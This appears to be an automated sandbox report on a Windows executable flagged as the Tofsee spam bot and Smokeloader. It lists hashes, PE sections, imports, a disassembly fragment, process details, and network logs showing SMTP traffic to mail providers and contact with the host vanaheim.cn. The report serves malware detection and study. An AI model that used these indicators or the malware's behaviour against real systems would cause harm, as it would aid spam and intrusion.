                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.O-6.!~6.!~6.!~Y..~*.!~Y..~/.!~Y..~D.!~?..~1.!~6. ~..!~Y..~7.!~Y..~7.!~Y..~7.!~Rich6.!~................PE..L......d.............................l............@.............................................................................P.......P...........................................................@N..@............................................text...T........................... ..`.data............|..................@....yey.................t..............@..@.rsrc...P............x..............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\SysWOW64\netsh.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):3773
                                                                                      Entropy (8bit):4.7109073551842435
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:VHILZNfrI7WFY32iIiNOmV/HToZV9It199hiALlIg39bWA1RvTBi/g2eB:VoLr0y9iIiNOoHTou7bhBlIydWALLt2w
                                                                                      MD5:DA3247A302D70819F10BCEEBAF400503
                                                                                      SHA1:2857AA198EE76C86FC929CC3388A56D5FD051844
                                                                                      SHA-256:5262E1EE394F329CD1F87EA31BA4A396C4A76EDC3A87612A179F81F21606ABC8
                                                                                      SHA-512:48FFEC059B4E88F21C2AA4049B7D9E303C0C93D1AD771E405827149EDDF986A72EF49C0F6D8B70F5839DCDBD6B1EA8125C8B300134B7F71C47702B577AD090F8
                                                                                      Malicious:false
                                                                                      Preview:..A specified value is not valid.....Usage: add rule name=<string>.. dir=in|out.. action=allow|block|bypass.. [program=<program path>].. [service=<service short name>|any].. [description=<string>].. [enable=yes|no (default=yes)].. [profile=public|private|domain|any[,...]].. [localip=any|<IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [remoteip=any|localsubnet|dns|dhcp|wins|defaultgateway|.. <IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [localport=0-65535|<port range>[,...]|RPC|RPC-EPMap|IPHTTPS|any (default=any)].. [remoteport=0-65535|<port range>[,...]|any (default=any)].. [protocol=0-255|icmpv4|icmpv6|icmpv4:type,code|icmpv6:type,code|.. tcp|udp|any (default=any)].. [interfacetype=wireless|lan|ras|any].. [rmtcomputergrp=<SDDL string>].. [rmtusrgrp=<SDDL string>].. [edge=yes|deferapp|deferuser|no (default=no)].. [security=authenticate|authenc|authdynenc|authnoencap|
                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):5.975423801517119
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:874A7cigvX.exe
                                                                                      File size:409'088 bytes
                                                                                      MD5:f7ae445081e10267d2cec9b6b0e2d375
                                                                                      SHA1:e12892ea4d092e4b959617c6d00356ee23da0797
                                                                                      SHA256:569edae4e4c7f5df590c7ee0a96210942e2be22be73beda9bc1528addca234f4
                                                                                      SHA512:194a260edb0ce0d6c9b74484b55d64e8d593c990ca647acf4c24dd4b58abee0e586485fb06970557d83cc97159933b55a9fa3cc9316f52c28d86552aa039ab04
                                                                                      SSDEEP:6144:ztRdHbfGeyTf8CJH1ci6aZRVDqQP4n48rMI8gVzuhZIIQFa0lw:ztRdHbfByTU3OTBtP44cMYW
                                                                                      TLSH:E594CF10BA93D875D5720534BC34CAB2273BBDA25834418B37943B7F3EF16916EA6392
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.O-6.!~6.!~6.!~Y..~*.!~Y..~/.!~Y..~D.!~?..~1.!~6. ~..!~Y..~7.!~Y..~7.!~Y..~7.!~Rich6.!~................PE..L......d...........
                                                                                      Icon Hash:cd4d3d2e4e054903
                                                                                      Entrypoint:0x406ce0
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x64D7AFB0 [Sat Aug 12 16:13:36 2023 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:5
                                                                                      OS Version Minor:1
                                                                                      File Version Major:5
                                                                                      File Version Minor:1
                                                                                      Subsystem Version Major:5
                                                                                      Subsystem Version Minor:1
                                                                                      Import Hash:9875b68adf5a82da587f07ad683d1acb
                                                                                      Instruction
                                                                                      call 00007F95E47F3A9Dh
                                                                                      jmp 00007F95E47EF98Eh
                                                                                      sub eax, 000003A4h
                                                                                      je 00007F95E47EFB24h
                                                                                      sub eax, 04h
                                                                                      je 00007F95E47EFB19h
                                                                                      sub eax, 0Dh
                                                                                      je 00007F95E47EFB0Eh
                                                                                      dec eax
                                                                                      je 00007F95E47EFB05h
                                                                                      xor eax, eax
                                                                                      ret
                                                                                      mov eax, 00000404h
                                                                                      ret
                                                                                      mov eax, 00000412h
                                                                                      ret
                                                                                      mov eax, 00000804h
                                                                                      ret
                                                                                      mov eax, 00000411h
                                                                                      ret
                                                                                      mov edi, edi
                                                                                      push esi
                                                                                      push edi
                                                                                      mov esi, eax
                                                                                      push 00000101h
                                                                                      xor edi, edi
                                                                                      lea eax, dword ptr [esi+1Ch]
                                                                                      push edi
                                                                                      push eax
                                                                                      call 00007F95E47F1EA5h
                                                                                      xor eax, eax
                                                                                      movzx ecx, ax
                                                                                      mov eax, ecx
                                                                                      mov dword ptr [esi+04h], edi
                                                                                      mov dword ptr [esi+08h], edi
                                                                                      mov dword ptr [esi+0Ch], edi
                                                                                      shl ecx, 10h
                                                                                      or eax, ecx
                                                                                      lea edi, dword ptr [esi+10h]
                                                                                      stosd
                                                                                      stosd
                                                                                      stosd
                                                                                      mov ecx, 00441040h
                                                                                      add esp, 0Ch
                                                                                      lea eax, dword ptr [esi+1Ch]
                                                                                      sub ecx, esi
                                                                                      mov edi, 00000101h
                                                                                      mov dl, byte ptr [ecx+eax]
                                                                                      mov byte ptr [eax], dl
                                                                                      inc eax
                                                                                      dec edi
                                                                                      jne 00007F95E47EFAF9h
                                                                                      lea eax, dword ptr [esi+0000011Dh]
                                                                                      mov esi, 00000100h
                                                                                      mov dl, byte ptr [eax+ecx]
                                                                                      mov byte ptr [eax], dl
                                                                                      inc eax
                                                                                      dec esi
                                                                                      jne 00007F95E47EFAF9h
                                                                                      pop edi
                                                                                      pop esi
                                                                                      ret
                                                                                      mov edi, edi
                                                                                      push ebp
                                                                                      mov ebp, esp
                                                                                      sub esp, 0000051Ch
                                                                                      mov eax, dword ptr [00441E78h]
                                                                                      xor eax, ebp
                                                                                      mov dword ptr [ebp-04h], eax
                                                                                      push ebx
                                                                                      push edi
                                                                                      lea eax, dword ptr [ebp-00000518h]
                                                                                      push eax
                                                                                      push dword ptr [esi+04h]
                                                                                      call dword ptr [00401130h]
                                                                                      mov edi, 00000100h
                                                                                      Programming Language:
                                                                                      • [C++] VS2010 build 30319
                                                                                      • [ASM] VS2010 build 30319
                                                                                      • [ C ] VS2010 build 30319
                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                      • [RES] VS2010 build 30319
                                                                                      • [LNK] VS2010 build 30319
                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x3f6c40x50.text
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x206f0000xc450.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x3f7140x1c.text
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x4e400x40.text
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x10000x1fc.text
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x10000x3f2540x3f4007ab7433d95fe1f96341728162b638f91False0.8364045516304348data7.609251717911276IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .data0x410000x202ce080x17c0018b35e49e42f21b75c2e03b67ddf0fc8unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .yey0x206e0000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .rsrc0x206f0000xc4500xc600c7fae4b954f7fac03d8f05855fd32d20False0.3594341856060606data4.347217336297205IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      AFX_DIALOG_LAYOUT0x2075eb80xedata1.5714285714285714
                                                                                      RT_CURSOR0x2075ec80x330Device independent bitmap graphic, 48 x 96 x 1, image size 00.1948529411764706
                                                                                      RT_CURSOR0x20761f80x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.33223684210526316
                                                                                      RT_CURSOR0x20763500xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.26439232409381663
                                                                                      RT_CURSOR0x20771f80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.3686823104693141
                                                                                      RT_CURSOR0x2077aa00x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.49060693641618497
                                                                                      RT_CURSOR0x20780380xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.27238805970149255
                                                                                      RT_CURSOR0x2078ee00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.375
                                                                                      RT_CURSOR0x20797880x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5057803468208093
                                                                                      RT_ICON0x206f6400xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilIndia0.4621535181236674
                                                                                      RT_ICON0x206f6400xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilSri Lanka0.4621535181236674
                                                                                      RT_ICON0x20704e80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilIndia0.572202166064982
                                                                                      RT_ICON0x20704e80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilSri Lanka0.572202166064982
                                                                                      RT_ICON0x2070d900x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.6336405529953917
                                                                                      RT_ICON0x2070d900x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.6336405529953917
                                                                                      RT_ICON0x20714580x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilIndia0.6936416184971098
                                                                                      RT_ICON0x20714580x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilSri Lanka0.6936416184971098
                                                                                      RT_ICON0x20719c00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TamilIndia0.35383817427385894
                                                                                      RT_ICON0x20719c00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TamilSri Lanka0.35383817427385894
                                                                                      RT_ICON0x2073f680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TamilIndia0.4383208255159475
                                                                                      RT_ICON0x2073f680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TamilSri Lanka0.4383208255159475
                                                                                      RT_ICON0x20750100x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TamilIndia0.510655737704918
                                                                                      RT_ICON0x20750100x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TamilSri Lanka0.510655737704918
                                                                                      RT_ICON0x20759980x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TamilIndia0.6081560283687943
                                                                                      RT_ICON0x20759980x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TamilSri Lanka0.6081560283687943
                                                                                      RT_STRING0x2079f880x51adataTamilIndia0.44104134762633995
                                                                                      RT_STRING0x2079f880x51adataTamilSri Lanka0.44104134762633995
                                                                                      RT_STRING0x207a4a80x582dataTamilIndia0.4390070921985816
                                                                                      RT_STRING0x207a4a80x582dataTamilSri Lanka0.4390070921985816
                                                                                      RT_STRING0x207aa300x2d2dataTamilIndia0.48753462603878117
                                                                                      RT_STRING0x207aa300x2d2dataTamilSri Lanka0.48753462603878117
                                                                                      RT_STRING0x207ad080x4b4dataTamilIndia0.4543189368770764
                                                                                      RT_STRING0x207ad080x4b4dataTamilSri Lanka0.4543189368770764
                                                                                      RT_STRING0x207b1c00x28adataTamilIndia0.4907692307692308
                                                                                      RT_STRING0x207b1c00x28adataTamilSri Lanka0.4907692307692308
                                                                                      RT_ACCELERATOR0x2075e780x40dataTamilIndia0.875
                                                                                      RT_ACCELERATOR0x2075e780x40dataTamilSri Lanka0.875
                                                                                      RT_GROUP_CURSOR0x20763280x22data1.0294117647058822
                                                                                      RT_GROUP_CURSOR0x20780080x30data0.9375
                                                                                      RT_GROUP_CURSOR0x2079cf00x30data0.9375
                                                                                      RT_GROUP_ICON0x2075e000x76dataTamilIndia0.6610169491525424
                                                                                      RT_GROUP_ICON0x2075e000x76dataTamilSri Lanka0.6610169491525424
                                                                                      RT_VERSION0x2079d200x264data0.5490196078431373
                                                                                      DLLImport
                                                                                      KERNEL32.dllGetCurrentProcess, SetDefaultCommConfigW, SetEnvironmentVariableW, CreateJobObjectW, UnlockFile, CreateHardLinkA, GetModuleHandleW, GetTickCount, FindNextVolumeMountPointA, GetNumberFormatA, GetWindowsDirectoryA, SetCommState, GlobalAlloc, SetFileShortNameW, LoadLibraryW, GetCalendarInfoA, SetVolumeMountPointA, GetConsoleAliasExesLengthW, GetFileAttributesW, VerifyVersionInfoA, GetModuleFileNameW, CreateActCtxA, GetThreadPriorityBoost, LCMapStringA, InterlockedExchange, GetLogicalDriveStringsA, SetLastError, GetProcAddress, CreateNamedPipeA, GetConsoleDisplayMode, GetProcessVersion, InterlockedDecrement, InterlockedExchangeAdd, CreateFileMappingW, CreateEventW, OpenEventA, GlobalWire, EnumDateFormatsA, EnumResourceNamesA, VirtualProtect, GetCurrentDirectoryA, PeekConsoleInputA, GetShortPathNameW, SetProcessShutdownParameters, GetDiskFreeSpaceExA, ReadConsoleInputW, DebugBreak, GetTempPathA, EnumCalendarInfoExA, LocalFree, TlsFree, CommConfigDialogW, WriteConsoleW, CloseHandle, FlushFileBuffers, GetConsoleMode, GetConsoleCP, HeapSize, EnumCalendarInfoW, GetLocaleInfoA, SetEndOfFile, GetConsoleAliasExesA, MultiByteToWideChar, HeapAlloc, GetLastError, HeapReAlloc, ExitProcess, DecodePointer, GetCommandLineA, HeapSetInformation, GetStartupInfoW, GetCPInfo, InterlockedIncrement, GetACP, GetOEMCP, IsValidCodePage, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, GetCurrentThreadId, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, HeapFree, IsProcessorFeaturePresent, WriteFile, GetStdHandle, HeapCreate, ReadFile, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, SetFilePointer, GetModuleFileNameA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringW, GetStringTypeW, Sleep, RaiseException, SetStdHandle, RtlUnwind, CreateFileW
                                                                                      USER32.dllGetMenuStringW, DrawStateA, LoadMenuW, GetWindowLongA, CharUpperW, GetSysColor, GetCaretPos, SetMenu
                                                                                      GDI32.dllCreateDCW, GetBitmapBits, GetCharWidthFloatA, GetCharWidth32A
                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                      TamilIndia
                                                                                      TamilSri Lanka
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Sep 7, 2024 15:14:55.493493080 CEST4970525192.168.2.552.101.42.0
                                                                                      Sep 7, 2024 15:14:56.500251055 CEST4970525192.168.2.552.101.42.0
                                                                                      Sep 7, 2024 15:14:58.515916109 CEST4970525192.168.2.552.101.42.0
                                                                                      Sep 7, 2024 15:14:58.574218988 CEST49706443192.168.2.577.232.41.29
                                                                                      Sep 7, 2024 15:14:58.574270010 CEST4434970677.232.41.29192.168.2.5
                                                                                      Sep 7, 2024 15:14:58.574362993 CEST49706443192.168.2.577.232.41.29
                                                                                      Sep 7, 2024 15:15:02.515858889 CEST4970525192.168.2.552.101.42.0
                                                                                      Sep 7, 2024 15:15:10.531486988 CEST4970525192.168.2.552.101.42.0
                                                                                      Sep 7, 2024 15:15:15.502469063 CEST4971225192.168.2.567.195.204.74
                                                                                      Sep 7, 2024 15:15:16.515852928 CEST4971225192.168.2.567.195.204.74
                                                                                      Sep 7, 2024 15:15:18.515850067 CEST4971225192.168.2.567.195.204.74
                                                                                      Sep 7, 2024 15:15:22.515793085 CEST4971225192.168.2.567.195.204.74
                                                                                      Sep 7, 2024 15:15:30.515762091 CEST4971225192.168.2.567.195.204.74
                                                                                      Sep 7, 2024 15:15:35.532682896 CEST4971325192.168.2.564.233.166.26
                                                                                      Sep 7, 2024 15:15:36.546994925 CEST4971325192.168.2.564.233.166.26
                                                                                      Sep 7, 2024 15:15:38.547022104 CEST4971325192.168.2.564.233.166.26
                                                                                      Sep 7, 2024 15:15:38.562834024 CEST49706443192.168.2.577.232.41.29
                                                                                      Sep 7, 2024 15:15:38.562897921 CEST4434970677.232.41.29192.168.2.5
                                                                                      Sep 7, 2024 15:15:38.562975883 CEST49706443192.168.2.577.232.41.29
                                                                                      Sep 7, 2024 15:15:38.673190117 CEST49714443192.168.2.577.232.41.29
                                                                                      Sep 7, 2024 15:15:38.673239946 CEST4434971477.232.41.29192.168.2.5
                                                                                      Sep 7, 2024 15:15:38.673321962 CEST49714443192.168.2.577.232.41.29
                                                                                      Sep 7, 2024 15:15:42.547060013 CEST4971325192.168.2.564.233.166.26
                                                                                      Sep 7, 2024 15:15:50.546967983 CEST4971325192.168.2.564.233.166.26
                                                                                      Sep 7, 2024 15:15:55.549953938 CEST4971625192.168.2.5217.69.139.150
                                                                                      Sep 7, 2024 15:15:56.562762976 CEST4971625192.168.2.5217.69.139.150
                                                                                      Sep 7, 2024 15:15:58.578284979 CEST4971625192.168.2.5217.69.139.150
                                                                                      Sep 7, 2024 15:16:02.593909025 CEST4971625192.168.2.5217.69.139.150
                                                                                      Sep 7, 2024 15:16:10.593833923 CEST4971625192.168.2.5217.69.139.150
                                                                                      Sep 7, 2024 15:16:18.672368050 CEST49714443192.168.2.577.232.41.29
                                                                                      Sep 7, 2024 15:16:18.672439098 CEST4434971477.232.41.29192.168.2.5
                                                                                      Sep 7, 2024 15:16:18.672523022 CEST49714443192.168.2.577.232.41.29
                                                                                      Sep 7, 2024 15:16:18.782577038 CEST49717443192.168.2.577.232.41.29
                                                                                      Sep 7, 2024 15:16:18.782610893 CEST4434971777.232.41.29192.168.2.5
                                                                                      Sep 7, 2024 15:16:18.782674074 CEST49717443192.168.2.577.232.41.29
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Sep 7, 2024 15:14:55.461682081 CEST5431953192.168.2.51.1.1.1
                                                                                      Sep 7, 2024 15:14:55.492765903 CEST53543191.1.1.1192.168.2.5
                                                                                      Sep 7, 2024 15:14:58.395411015 CEST5773153192.168.2.51.1.1.1
                                                                                      Sep 7, 2024 15:14:58.573323011 CEST53577311.1.1.1192.168.2.5
                                                                                      Sep 7, 2024 15:15:15.485579967 CEST6277253192.168.2.51.1.1.1
                                                                                      Sep 7, 2024 15:15:15.493833065 CEST53627721.1.1.1192.168.2.5
                                                                                      Sep 7, 2024 15:15:15.494482040 CEST6350853192.168.2.51.1.1.1
                                                                                      Sep 7, 2024 15:15:15.501846075 CEST53635081.1.1.1192.168.2.5
                                                                                      Sep 7, 2024 15:15:35.516355991 CEST6235353192.168.2.51.1.1.1
                                                                                      Sep 7, 2024 15:15:35.523921967 CEST53623531.1.1.1192.168.2.5
                                                                                      Sep 7, 2024 15:15:35.524554968 CEST5373253192.168.2.51.1.1.1
                                                                                      Sep 7, 2024 15:15:35.532021999 CEST53537321.1.1.1192.168.2.5
                                                                                      Sep 7, 2024 15:15:55.531979084 CEST5142953192.168.2.51.1.1.1
                                                                                      Sep 7, 2024 15:15:55.539191961 CEST53514291.1.1.1192.168.2.5
                                                                                      Sep 7, 2024 15:15:55.539833069 CEST5564153192.168.2.51.1.1.1
                                                                                      Sep 7, 2024 15:15:55.549460888 CEST53556411.1.1.1192.168.2.5
                                                                                      Sep 7, 2024 15:16:57.386473894 CEST5507253192.168.2.51.1.1.1
                                                                                      Sep 7, 2024 15:16:57.395345926 CEST53550721.1.1.1192.168.2.5
                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Sep 7, 2024 15:14:55.461682081 CEST192.168.2.51.1.1.10x9b6eStandard query (0)microsoft-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                      Sep 7, 2024 15:14:58.395411015 CEST192.168.2.51.1.1.10x15f6Standard query (0)vanaheim.cnA (IP address)IN (0x0001)false
                                                                                      Sep 7, 2024 15:15:15.485579967 CEST192.168.2.51.1.1.10x767Standard query (0)yahoo.comMX (Mail exchange)IN (0x0001)false
                                                                                      Sep 7, 2024 15:15:15.494482040 CEST192.168.2.51.1.1.10xf1c7Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                      Sep 7, 2024 15:15:35.516355991 CEST192.168.2.51.1.1.10x9c37Standard query (0)google.comMX (Mail exchange)IN (0x0001)false
                                                                                      Sep 7, 2024 15:15:35.524554968 CEST192.168.2.51.1.1.10x669Standard query (0)smtp.google.comA (IP address)IN (0x0001)false
                                                                                      Sep 7, 2024 15:15:55.531979084 CEST192.168.2.51.1.1.10xda1eStandard query (0)mail.ruMX (Mail exchange)IN (0x0001)false
                                                                                      Sep 7, 2024 15:15:55.539833069 CEST192.168.2.51.1.1.10xf5fcStandard query (0)mxs.mail.ruA (IP address)IN (0x0001)false
                                                                                      Sep 7, 2024 15:16:57.386473894 CEST192.168.2.51.1.1.10xaf64Standard query (0)microsoft-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Sep 7, 2024 15:14:55.492765903 CEST1.1.1.1192.168.2.50x9b6eNo error (0)microsoft-com.mail.protection.outlook.com52.101.42.0A (IP address)IN (0x0001)false
                                                                                      Sep 7, 2024 15:14:55.492765903 CEST1.1.1.1192.168.2.50x9b6eNo error (0)microsoft-com.mail.protection.outlook.com52.101.11.0A (IP address)IN (0x0001)false
                                                                                      Sep 7, 2024 15:14:55.492765903 CEST1.1.1.1192.168.2.50x9b6eNo error (0)microsoft-com.mail.protection.outlook.com52.101.40.26A (IP address)IN (0x0001)false
                                                                                      Sep 7, 2024 15:14:55.492765903 CEST1.1.1.1192.168.2.50x9b6eNo error (0)microsoft-com.mail.protection.outlook.com52.101.8.49A (IP address)IN (0x0001)false
                                                                                      Sep 7, 2024 15:14:58.573323011 CEST1.1.1.1192.168.2.50x15f6No error (0)vanaheim.cn77.232.41.29A (IP address)IN (0x0001)false
                                                                                      Sep 7, 2024 15:15:15.493833065 CEST1.1.1.1192.168.2.50x767No error (0)yahoo.comMX (Mail exchange)IN (0x0001)false
                                                                                      Sep 7, 2024 15:15:15.493833065 CEST1.1.1.1192.168.2.50x767No error (0)yahoo.comMX (Mail exchange)IN (0x0001)false
                                                                                      Sep 7, 2024 15:15:15.493833065 CEST1.1.1.1192.168.2.50x767No error (0)yahoo.comMX (Mail exchange)IN (0x0001)false
                                                                                      Sep 7, 2024 15:15:15.501846075 CEST1.1.1.1192.168.2.50xf1c7No error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                      Sep 7, 2024 15:15:15.501846075 CEST1.1.1.1192.168.2.50xf1c7No error (0)mta7.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                      Sep 7, 2024 15:15:15.501846075 CEST1.1.1.1192.168.2.50xf1c7No error (0)mta7.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                      Sep 7, 2024 15:15:15.501846075 CEST1.1.1.1192.168.2.50xf1c7No error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                      Sep 7, 2024 15:15:15.501846075 CEST1.1.1.1192.168.2.50xf1c7No error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                      Sep 7, 2024 15:15:15.501846075 CEST1.1.1.1192.168.2.50xf1c7No error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                      Sep 7, 2024 15:15:15.501846075 CEST1.1.1.1192.168.2.50xf1c7No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                      Sep 7, 2024 15:15:15.501846075 CEST1.1.1.1192.168.2.50xf1c7No error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                      Sep 7, 2024 15:15:35.523921967 CEST1.1.1.1192.168.2.50x9c37No error (0)google.comMX (Mail exchange)IN (0x0001)false
                                                                                      Sep 7, 2024 15:15:35.532021999 CEST1.1.1.1192.168.2.50x669No error (0)smtp.google.com64.233.166.26A (IP address)IN (0x0001)false
                                                                                      Sep 7, 2024 15:15:35.532021999 CEST1.1.1.1192.168.2.50x669No error (0)smtp.google.com74.125.133.26A (IP address)IN (0x0001)false
                                                                                      Sep 7, 2024 15:15:35.532021999 CEST1.1.1.1192.168.2.50x669No error (0)smtp.google.com74.125.71.27A (IP address)IN (0x0001)false
                                                                                      Sep 7, 2024 15:15:35.532021999 CEST1.1.1.1192.168.2.50x669No error (0)smtp.google.com64.233.166.27A (IP address)IN (0x0001)false
                                                                                      Sep 7, 2024 15:15:35.532021999 CEST1.1.1.1192.168.2.50x669No error (0)smtp.google.com74.125.71.26A (IP address)IN (0x0001)false
                                                                                      Sep 7, 2024 15:15:55.539191961 CEST1.1.1.1192.168.2.50xda1eNo error (0)mail.ruMX (Mail exchange)IN (0x0001)false
                                                                                      Sep 7, 2024 15:15:55.549460888 CEST1.1.1.1192.168.2.50xf5fcNo error (0)mxs.mail.ru217.69.139.150A (IP address)IN (0x0001)false
                                                                                      Sep 7, 2024 15:15:55.549460888 CEST1.1.1.1192.168.2.50xf5fcNo error (0)mxs.mail.ru94.100.180.31A (IP address)IN (0x0001)false
                                                                                      Sep 7, 2024 15:16:57.395345926 CEST1.1.1.1192.168.2.50xaf64No error (0)microsoft-com.mail.protection.outlook.com52.101.11.0A (IP address)IN (0x0001)false
                                                                                      Sep 7, 2024 15:16:57.395345926 CEST1.1.1.1192.168.2.50xaf64No error (0)microsoft-com.mail.protection.outlook.com52.101.40.26A (IP address)IN (0x0001)false
                                                                                      Sep 7, 2024 15:16:57.395345926 CEST1.1.1.1192.168.2.50xaf64No error (0)microsoft-com.mail.protection.outlook.com52.101.42.0A (IP address)IN (0x0001)false
                                                                                      Sep 7, 2024 15:16:57.395345926 CEST1.1.1.1192.168.2.50xaf64No error (0)microsoft-com.mail.protection.outlook.com52.101.8.49A (IP address)IN (0x0001)false

                                                                                      Click to jump to process

                                                                                      Click to jump to process

                                                                                      Click to dive into process behavior distribution

                                                                                      Click to jump to process

                                                                                      Target ID:0
                                                                                      Start time:09:14:49
                                                                                      Start date:07/09/2024
                                                                                      Path:C:\Users\user\Desktop\874A7cigvX.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\874A7cigvX.exe"
                                                                                      Imagebase:0x400000
                                                                                      File size:409'088 bytes
                                                                                      MD5 hash:F7AE445081E10267D2CEC9B6B0E2D375
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: Windows_Trojan_Tofsee_26124fe4, Description: unknown, Source: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
